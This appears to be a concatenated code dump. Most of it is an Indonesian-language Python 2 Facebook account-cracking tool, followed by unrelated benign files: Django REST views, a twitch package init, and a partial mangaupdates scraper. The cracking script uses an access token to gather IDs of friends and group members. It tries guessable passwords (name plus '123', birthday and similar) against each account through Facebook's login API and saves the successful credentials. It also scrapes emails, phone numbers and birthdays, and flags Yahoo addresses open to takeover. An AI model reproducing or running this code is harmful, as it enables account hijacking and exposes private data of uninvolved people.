unikers =="2": grupsaya() elif unikers =="3": informasi() elif unikers =="4": yahoo() elif unikers =="0": os.system('clear') jalan('Menghapus token') os.system('rm -rf login.txt') keluar() else: print "\033[1;96m[!] \x1b[1;91mIsi yang benar" pilih() def super(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() os.system('clear') print logo print 42*"\033[1;96m=" print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman" print "\x1b[1;97m2.\x1b[1;93m Crack dari teman" print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup" print "\x1b[1;97m4.\x1b[1;93m Crack dari file" print "\n\x1b[1;91m0.\x1b[1;91m Kembali" pilih_super() def pilih_super(): peak = raw_input("\n\033[1;97m >>> \033[1;97m") if peak =="": print "\033[1;96m[!] \x1b[1;91mIsi yang benar" pilih_super() elif peak =="1": os.system('clear') print logo print 42*"\033[1;96m=" jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) elif peak =="2": os.system('clear') print logo print 42*"\033[1;96m=" idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m") try: jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket) op = json.loads(jok.text) print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"] except KeyError: print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") super() jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket) z = json.loads(r.text) for i in z['data']: id.append(i['id']) elif peak =="3": os.system('clear') print logo print 42*"\033[1;96m=" idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ') try: r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket) asw=json.loads(r.text) print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name'] except KeyError: print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") super() jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket) s=json.loads(re.text) for p in s['data']: id.append(p['id']) elif peak =="4": os.system('clear') print logo print 42*"\033[1;96m=" try: idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m') for line in open(idlist,'r').readlines(): id.append(line.strip()) except IOError: print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan' raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]') super() elif peak =="0": menu() else: print "\033[1;96m[!] \x1b[1;91mIsi yang benar" pilih_super() print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id)) titik = ['. ','.. ','... '] for o in titik: print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1) print print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') print 42*"\033[1;96m=" def main(arg): global cekpoint,oks user = arg try: os.mkdir('out') except OSError: pass try: a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket) b = json.loads(a.text) pass1 = b['first_name']+'123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n' oks.append(user+pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass1+"\n") cek.close() cekpoint.append(user+pass1) else: pass2 = b['first_name']+'12345' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n' oks.append(user+pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass2+"\n") cek.close() cekpoint.append(user+pass2) else: pass3 = b['last_name'] + '123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n' oks.append(user+pass3) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass3+"\n") cek.close() cekpoint.append(user+pass3) else: pass4 = 'Bangsat' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n' oks.append(user+pass4) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass4+"\n") cek.close() cekpoint.append(user+pass4) else: birthday = b['birthday'] pass5 = birthday.replace('/', '') data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n' oks.append(user+pass5) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass5+"\n") cek.close() cekpoint.append(user+pass5) else: pass6 = 'Sayang' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n' oks.append(user+pass6) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass6+"\n") cek.close() cekpoint.append(user+pass6) except: pass p = ThreadPool(30) p.map(main, id) print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint)) print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt") raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") super() def grupsaya(): os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: os.mkdir('out') except OSError: pass os.system('clear') print logo print 42*"\033[1;96m=" try: uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket) gud = json.loads(uh.text) for p in gud['data']: nama = p["name"] id = p["id"] f=open('out/Grupid.txt','w') listgrup.append(id) f.write(id + '\n') print("\033[1;96m[✓] \033[1;92mGROUP SAYA") print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id)) print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n') print 42*"\033[1;96m=" print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup)) print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt") f.close() raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() except (KeyboardInterrupt,EOFError): print("\033[1;96m[!] \x1b[1;91mTerhenti") raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() except KeyError: os.remove('out/Grupid.txt') print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan') raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() except requests.exceptions.ConnectionError: print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi" keluar() except IOError: print "\033[1;96m[!] \x1b[1;91mError" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() def informasi(): os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;91m[!] Token invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() os.system('clear') print logo print 42*"\033[1;96m=" aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m') jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket) cok = json.loads(r.text) for i in cok['data']: if aid in i['name'] or aid in i['id']: x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket) z = json.loads(x.text) print 43*"\033[1;96m=" try: print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name'] except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id'] except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email'] except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone'] except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name'] except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday'] except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada' try: print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : ' for q in z['education']: try: print '\033[1;91m ~ \033[1;97m'+q['school']['name'] except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada' except KeyError: pass raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() else: pass else: print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() def yahoo(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;91m[!] Token invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() os.system('clear') print logo print 42*"\033[1;96m=" print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman" print "\x1b[1;97m2.\x1b[1;93m Clone dari teman" print "\x1b[1;97m3.\x1b[1;93m Clone dari member group" print "\x1b[1;97m4.\x1b[1;93m Clone dari file" print "\n\x1b[1;91m0.\x1b[1;91m Kembali" clone() def clone(): embuh = raw_input("\n\x1b[1;97m >>> ") if embuh =="": print "\033[1;96m[!] \x1b[1;91mIsi yang benar" elif embuh =="1": clone_dari_daftar_teman() elif embuh =="2": clone_dari_teman() elif embuh =="3": clone_dari_member_group() elif embuh =="4": clone_dari_file() elif embuh =="0": menu() else: print "\033[1;96m[!] \x1b[1;91mIsi yang benar" def clone_dari_daftar_teman(): global toket os.system('reset') try: toket=open('login.txt','r').read() except IOError: print"\033[1;91m[!] Token Invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: os.mkdir('out') except OSError: pass os.system('clear') print logo mpsh = [] jml = 0 print 42*"\033[1;96m=" jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...') teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket) kimak = json.loads(teman.text) jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...') print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') print 42*"\033[1;96m=" for w in kimak['data']: jml +=1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile(r'@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") br._factory.is_html = True br.select_form(nr=0) br["username"] = mail klik = br.submit().read() jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: continue if '"messages.ERROR_INVALID_USERNAME">' in pek: print("\033[1;96m[✓] \033[1;92mVULN") print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n') save = open('out/MailVuln.txt','a') save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') save.close() berhasil.append(mail) except KeyError: pass print 42*"\033[1;96m=" print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() def clone_dari_teman(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: os.mkdir('out') except OSError: pass os.system('clear') print logo mpsh = [] jml = 0 print 42*"\033[1;96m=" idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m") try: jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket) op = json.loads(jok.text) print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"] except KeyError: print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...') teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket) kimak = json.loads(teman.text) jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') print 43*"\033[1;96m=" for w in kimak['data']: jml +=1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile(r'@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") br._factory.is_html = True br.select_form(nr=0) br["username"] = mail klik = br.submit().read() jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: continue if '"messages.ERROR_INVALID_USERNAME">' in pek: print("\033[1;96m[✓] \033[1;92mVULN") print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama) save = open('out/TemanMailVuln.txt','a') save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') save.close() berhasil.append(mail) except KeyError: pass print 42*"\033[1;96m=" print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() def clone_dari_member_group(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: os.mkdir('out') except OSError: pass os.system('clear') print logo mpsh = [] jml = 0 print 42*"\033[1;96m=" id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ') try: r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket) asw=json.loads(r.text) print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name'] except KeyError: print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...') teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket) kimak = json.loads(teman.text) jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') print 42*"\033[1;96m=" for w in kimak['data']: jml +=1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile(r'@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") br._factory.is_html = True br.select_form(nr=0) br["username"] = mail klik = br.submit().read() jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: continue if '"messages.ERROR_INVALID_USERNAME">' in pek: print("\033[1;96m[✓] \033[1;92mVULN") print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama) save = open('out/GrupMailVuln.txt','a') save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') save.close() berhasil.append(mail) except KeyError: pass print 42*"\033[1;96m=" print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() def clone_dari_file(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\033[1;96m[!] \x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) keluar() try: os.mkdir('out') except OSError: pass os.system('clear') print logo print 42*"\033[1;96m=" files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m") try: total = open(files,"r") mail = total.readlines() except IOError: print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() mpsh = [] jml = 0 jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') print 42*"\033[1;96m=" mail = open(files,"r").readlines() for pw in mail: mail = pw.replace("\n","") jml +=1 mpsh.append(jml) yahoo = re.compile(r'@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") br._factory.is_html = True br.select_form(nr=0) br["username"] = mail klik = br.submit().read() jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: continue if '"messages.ERROR_INVALID_USERNAME">' in pek: print("\033[1;96m[✓] \033[1;92mVULN") print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) save = open('out/MailVuln.txt','a') save.write("Email: "+ mail + '\n\n') save.close() berhasil.append(mail) print 42*"\033[1;96m=" print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt" raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") menu() if __name__ == '__main__': siapa()
b27f35b93e426e634255d190bc26186e448a325a
98892d10a50f7032238aed257d690ba0d7d5ef2b
/basicREST/views.py
90e98b8904bdcde7526d173e11944c71da61e726
[]
no_license
ivishalvarshney/djangoREST
f21f7f4a83437e8eefb91980555bf63dbdfd3d69
30f31546f4566d5b1ec8e2a7a7c34096693dc89c
refs/heads/master
2020-04-17T07:44:52.964395
2019-01-29T12:40:38
2019-01-29T12:40:38
166,382,332
0
0
null
null
null
null
UTF-8
Python
false
false
1,115
py
from django.shortcuts import render from django.http import HttpResponse from django.shortcuts import get_object_or_404 import json from django.http import QueryDict def index(request): return HttpResponse("Hello, world. You're at the REST index.") def get(request): if request.method == 'GET': value = request.GET.get('name', "blahblah") return HttpResponse("this is get request." + value) else: return HttpResponse("Invalid request.") def post(request): if request.method == 'POST': value = str(request.POST.get('name', "blahblah")) return HttpResponse("this is POST request." + value) else: return HttpResponse("Invalid request.") def put(request): if request.method == 'PUT': put = QueryDict(request.body) description = put.get('name') return HttpResponse("this is PUT request." + description) else: return HttpResponse("Invalid request.") def delete(request): if request.method == 'DELETE': delete = QueryDict(request.body) description = delete.get('name') return HttpResponse("this is DELETE request." + description) else: return HttpResponse("Invalid request.")
4ef58c2409ab968d93a3503e6b30e0956b126cb9
4b75b77d262fce1752b5a6d224d3a398ab9fe6f6
/ClipSearcher/venv/Lib/site-packages/twitch/helix/models/__init__.py
587b7577b7184b47de4f3c6641ffa1e2ebaf872a
[]
no_license
Tathomp/TwitchClipScrapper
46f11bd399f45d574e1c2aa06010843dcebe4cfc
c0d8dfff2677dbeb42a796a9e8147059d2088996
refs/heads/main
2023-01-04T19:43:03.119768
2020-10-22T23:26:01
2020-10-22T23:26:01
306,475,412
0
0
null
null
null
null
UTF-8
Python
false
false
108
py
from .stream import Stream from .user import User from .video import Video __all__ = [Stream, User, Video]
6eb51316bd90d06bb54e6bc81ddd6e710b4e2736
5cd687035dbcbc72ef479ad58d80a7c1b085f950
/mangaupdates
d82bd772a5290394f1459ec948a63edf0e4400fa
[]
no_license
otommod/bin
25db0680294008e4542fe6f1f60a7dba11b6aa2f
3a31cff03b95a6de39d4ecbc05e58db25aebcb1b
refs/heads/master
2021-01-20T21:01:12.290536
2018-04-22T23:44:43
2018-04-22T23:44:43
101,743,304
0
0
null
null
null
null
UTF-8
Python
false
false
3,159
#!/usr/bin/env python3 import sys from collections import namedtuple from datetime import datetime from concurrent.futures import Future, ThreadPoolExecutor, as_completed import requests from bs4 import BeautifulSoup # ReleaseInfo = namedtuple('ReleaseInfo', 'date link volume chapter group') class ReleaseInfo(namedtuple('ReleaseInfo', 'date manga volume chapters group')): @classmethod def from_tr_bs(cls, bs): date, manga, volume, chapters, group = bs('td') try: date = datetime.strptime(date.text, '%m/%d/%y') except ValueError: date = datetime.min manga = manga.text volume = volume.text chapters = chapters.text group = group.text return cls(date, manga, volume, chapters, group) def __str__(self): return '{0} c.{1} ({2.days}d) by {3}'.format( self.manga, self.chapters, datetime.now() - self.date, self.group) def download_page(series_id, page=1, ascending=True): r = requests.get('https://www.mangaupdates.com/releases.html', params={'search': series_id, 'page': page, 'asc': 'asc' if ascending else 'desc', 'perpage': 100, 'stype': 'series'}) return BeautifulSoup(r.text) def extract_pagenum(bs): pages = [t for t in bs('td', class_='specialtext') if t.text.startswith('Pages')] if pages: pages = pages[0].contents[0].strip(' Pages()') else: pages = 1 return int(pages) def extract_releases(bs): releases_table_title = bs.find('td', class_='releasestitle').parent releases_table = releases_table_title.find_next_siblings('tr') releases_table = [tr for tr in releases_table if len(tr.contents) == 11] return [ReleaseInfo.from_tr_bs(tr) for tr in releases_table] def get_releases_page(series_id, page): return extract_releases(download_page(series_id, page)) def get_pagenum(series_id): bs = download_page(series_id) 